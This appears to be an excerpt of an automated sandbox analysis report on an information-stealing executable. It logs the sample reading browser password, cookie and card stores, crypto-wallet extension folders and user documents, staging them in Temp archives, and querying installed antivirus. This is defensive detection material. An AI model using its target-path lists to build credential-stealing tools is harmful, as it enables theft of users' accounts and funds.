            Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\
            Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\
            Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\
            Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\
            Source: C:\Users\user\Desktop\765iYbgWn9.exe File opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\
            Source: CreditCardData.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: CreditCardData.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: CreditCardData.0.dr Binary or memory string: discord.comVMware20,11696428655f
            Source: CreditCardData.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: CreditCardData.0.dr Binary or memory string: global block list test formVMware20,11696428655
            Source: 765iYbgWn9.exe, 00000000.00000003.2474017653.0000019C72E8C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMCIZM
            Source: CreditCardData.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: CreditCardData.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: CreditCardData.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: CreditCardData.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: CreditCardData.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: CreditCardData.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: CreditCardData.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: CreditCardData.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: CreditCardData.0.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
            Source: CreditCardData.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: CreditCardData.0.dr Binary or memory string: outlook.office.comVMware20,11696428655s
            Source: CreditCardData.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: CreditCardData.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: CreditCardData.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: CreditCardData.0.dr Binary or memory string: AMC password management pageVMware20,11696428655
            Source: CreditCardData.0.dr Binary or memory string: tasks.office.comVMware20,11696428655o
            Source: CreditCardData.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: CreditCardData.0.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
            Source: CreditCardData.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: CreditCardData.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: CreditCardData.0.dr Binary or memory string: dev.azure.comVMware20,11696428655j
            Source: CreditCardData.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: CreditCardData.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: CreditCardData.0.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
            Source: CreditCardData.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: CreditCardData.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Memory allocated: page read and write | page guard
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\AppData\Roaming VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\AppData\Local VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\AppData\Local\CEF\User Data VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\Desktop VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\Desktop\765iYbgWn9.exe VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\Desktop\Excel.lnk VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\Desktop\IVHSHTCODI.pdf VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\Desktop\JDSOXXXWOA.docx VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\Desktop\JDSOXXXWOA.xlsx VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\Desktop\MNULNCRIYC.png VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\Desktop\MQAWXUYAIK.mp3 VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\Desktop\MQAWXUYAIK.pdf VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\Desktop\QVTVNIBKSD.jpg VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\Desktop\TQDGENUHWP.mp3 VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\Desktop\TTCBKWZYOC.jpg VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\Desktop\TTCBKWZYOC.xlsx VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\Desktop\UQMPCTZARJ.docx VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\Desktop\XQACHMZIHU.png VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\Documents VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\Documents\desktop.ini VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\Documents\IVHSHTCODI.pdf VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\Documents\JDSOXXXWOA.docx VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\Documents\JDSOXXXWOA.xlsx VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\Documents\MNULNCRIYC.png VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\Documents\MQAWXUYAIK.mp3 VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\Documents\MQAWXUYAIK.pdf VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\Documents\QVTVNIBKSD.jpg VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\Documents\TQDGENUHWP.mp3 VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\Documents\TTCBKWZYOC.jpg VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\Documents\TTCBKWZYOC.xlsx VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\Documents\XQACHMZIHU.png VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\AppData\Local\Temp\sensitive-files.zip VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Autofill VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Cookies VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\screen1.png VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\sensitive-files.zip VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\user_info.txt VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Wallets VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Passwords\Chrome_Default.txt VolumeInformation
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Passwords\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Passwords\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\History\Chrome_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\History\Chrome_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\History\Edge_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\History\Edge_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Downloads\Chrome_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Downloads\Chrome_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Downloads\Edge_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Downloads\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\CreditCards\Chrome_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\CreditCards\Chrome_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\CreditCards\Firefox_Firefox.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Cookies\Chrome_Default_Network.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Autofill VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Cookies VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\History VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\screen1.png VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\screen1.png VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\sensitive-files.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Passwords\Chrome_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Passwords\Chrome_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Passwords\Edge_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Passwords\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\History\Chrome_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\History\Chrome_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\History\Edge_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\History\Edge_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Downloads\Chrome_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Downloads\Edge_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\CreditCards\Chrome_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Autofill\Chrome_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\out.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

            Stealing of Sensitive Information

            Source: Yara match | File source: 765iYbgWn9.exe, type: SAMPLE
            Source: Yara match | File source: sslproxydump.pcap, type: PCAP
            Source: Yara match | File source: 0.0.765iYbgWn9.exe.7ff6a5820000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: Process Memory Space: 765iYbgWn9.exe PID: 1996, type: MEMORYSTR
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pnlccmojcmeohlpggmfnbbiapkmbliob
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\58ef9818-5ea1-49a0-b5b0-9338401a7943\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\igkpcodhieompeloncfnbekccinhapdb
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bmikpgodpkclnkgmnpphehdgcimmided
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kmhcihpebfmpgmihbkipmjlmmioameka
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\Login Data
            Source: C:\Users\user\Desktop\765iYbgWn9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
